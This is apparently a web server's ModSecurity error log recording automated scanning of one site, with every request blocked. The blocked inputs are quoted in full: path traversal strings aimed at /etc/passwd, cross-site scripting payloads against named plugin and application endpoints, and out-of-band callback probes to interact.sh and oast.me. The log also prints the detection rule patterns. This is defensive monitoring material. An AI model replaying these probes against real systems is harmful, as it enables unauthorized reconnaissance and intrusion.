[Tue Aug 29 11:54:55.774266 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAoz7@gAAAAS"]
[Tue Aug 29 11:54:56.771679 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqhOAcAAAAE"]
[Tue Aug 29 11:54:58.213212 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApbUZQAAAAh"]
[Tue Aug 29 11:54:58.301151 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcEAAAAl"]
[Tue Aug 29 11:54:58.301192 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcEAAAAl"]
[Tue Aug 29 11:54:59.711892 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAApXgjgAAAAU"]
[Tue Aug 29 11:54:59.811932 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApOdgcAAAAL"]
[Tue Aug 29 11:55:02.799425 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqTvnUAAAAa"]
[Tue Aug 29 11:55:03.991506 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoz8A4AAAAS"]
[Tue Aug 29 11:55:04.618814 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAoz8BcAAAAS"]
[Tue Aug 29 11:55:05.748557 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqqtaUAAAAA"]
[Tue Aug 29 11:55:05.976169 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAApXglMAAAAU"]
[Tue Aug 29 11:55:06.626298 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXgl0AAAAU"]
[Tue Aug 29 11:55:06.678380 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApHRdQAAAAP"]
[Tue Aug 29 11:55:08.544576 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApa-L8AAAAg"]
[Tue Aug 29 11:55:11.651260 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApbUdAAAAAh"]
[Tue Aug 29 11:55:11.869034 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAApbUdIAAAAh"]
[Tue Aug 29 11:55:12.645430 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApXgnAAAAAU"]
[Tue Aug 29 11:55:14.646238 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApHRfQAAAAP"]
[Tue Aug 29 11:55:14.676638 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAqSwp4AAAAN"]
[Tue Aug 29 11:55:16.555366 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqeFSwAAAAx"]
[Tue Aug 29 11:55:16.989689 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6CMAAAAr"]
[Tue Aug 29 11:55:17.543793 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqSwrEAAAAN"]
[Tue Aug 29 11:55:17.628665 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqY6CsAAAAr"]
[Tue Aug 29 11:55:18.604671 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqeFTYAAAAx"]
[Tue Aug 29 11:55:19.575308 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqsV5gAAAAB"]
[Tue Aug 29 11:55:19.814679 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqeFT8AAAAx"]
[Tue Aug 29 11:55:20.535676 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqeFUIAAAAx"]
[Tue Aug 29 11:55:22.605250 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApXgogAAAAU"]
[Tue Aug 29 11:55:22.759900 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApHRgwAAAAP"]
[Tue Aug 29 11:55:23.916723 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqqtegAAAAA"]
[Tue Aug 29 11:55:24.002213 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAoAlAEAAAAC"]
